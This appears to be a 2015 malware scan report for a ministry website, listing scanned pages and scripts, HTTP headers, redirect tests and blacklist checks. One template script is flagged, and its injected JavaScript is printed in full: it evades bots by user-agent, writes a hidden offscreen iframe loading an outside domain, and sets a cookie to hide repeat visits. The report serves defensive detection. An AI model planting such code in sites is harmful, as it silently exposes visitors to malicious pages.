Scanned pages/files
| Request | Server response | Status |
http://accelerateministries.com/ | 200 OK Content-Length: 14732 Content-Type: text/html | clean |
http://accelerateministries.com/media/system/js/caption.js | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://accelerateministries.com/templates/rt_refraction_j15/js/rokfonts.js | 200 OK Content-Length: 2203 Content-Type: text/javascript | clean |
http://accelerateministries.com/templates/rt_refraction_j15/js/rokutils.js | 200 OK Content-Length: 2563 Content-Type: text/javascript | clean |
http://accelerateministries.com/templates/rt_refraction_j15/js/rokutils.inputs.js | 200 OK Content-Length: 2491 Content-Type: text/javascript | clean |
http://accelerateministries.com/templates/rt_refraction_j15/js/rokmoomenu.js | 200 OK Content-Length: 5047 Content-Type: text/javascript | clean |
http://accelerateministries.com/templates/rt_refraction_j15/js/mootools.bgiframe.js | 200 OK Content-Length: 965 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCookie("akelbriston19ure")===undefined);if(!h()&&i){document.write('<iframe width="112" height="132" style="position:absolute;margin-top:-1002px;" src="http://connorpl.ml/luckyblock17.html"></iframe>');var j=new Date(new Date().getTime()+48*60*60*1000);document.cookie="akelbriston19ure=1; path=/; expires="+j.toUTCString()}})();
Antivirus reports:
| ||
http://accelerateministries.com/index.php?option=com_content&view=article&id=1&Itemid=2 | 200 OK Content-Length: 13569 Content-Type: text/html | clean |
http://accelerateministries.com/index.php?option=com_content&view=article&id=1&Itemid=7 | 200 OK Content-Length: 13576 Content-Type: text/html | clean |
http://accelerateministries.com/index.php?option=com_content&view=article&id=2&Itemid=8 | 200 OK Content-Length: 14068 Content-Type: text/html | clean |
http://accelerateministries.com/index.php?option=com_content&view=article&id=3&Itemid=9 | 200 OK Content-Length: 13775 Content-Type: text/html | clean |
http://accelerateministries.com/index.php?option=com_content&view=article&id=4&Itemid=3 | 200 OK Content-Length: 13620 Content-Type: text/html | clean |
http://accelerateministries.com/index.php?option=com_content&view=article&id=4&Itemid=10 | 200 OK Content-Length: 13627 Content-Type: text/html | clean |
http://accelerateministries.com/index.php?option=com_content&view=article&id=5&Itemid=11 | 200 OK Content-Length: 13423 Content-Type: text/html | clean |
http://accelerateministries.com/index.php?option=com_content&view=article&id=9&Itemid=4 | 200 OK Content-Length: 11724 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: accelerateministries.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Wed, 28 Jan 2015 01:20:27 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 28 Jan 2015 01:20:27 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 2db4f5f25f138a01a5258e9e796018b5=97he07h6veacmi87hv6higprn6; path=/
GET / HTTP/1.1
Host: accelerateministries.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Wed, 28 Jan 2015 01:20:27 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 28 Jan 2015 01:20:27 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 2db4f5f25f138a01a5258e9e796018b5=97he07h6veacmi87hv6higprn6; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: accelerateministries.com
Referer: http://www.google.com/search?q=accelerateministries.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: accelerateministries.com
Referer: http://www.google.com/search?q=accelerateministries.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=accelerateministries.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://accelerateministries.com/
Result: accelerateministries.com is not infected or malware details are not published yet.
Result: accelerateministries.com is not infected or malware details are not published yet.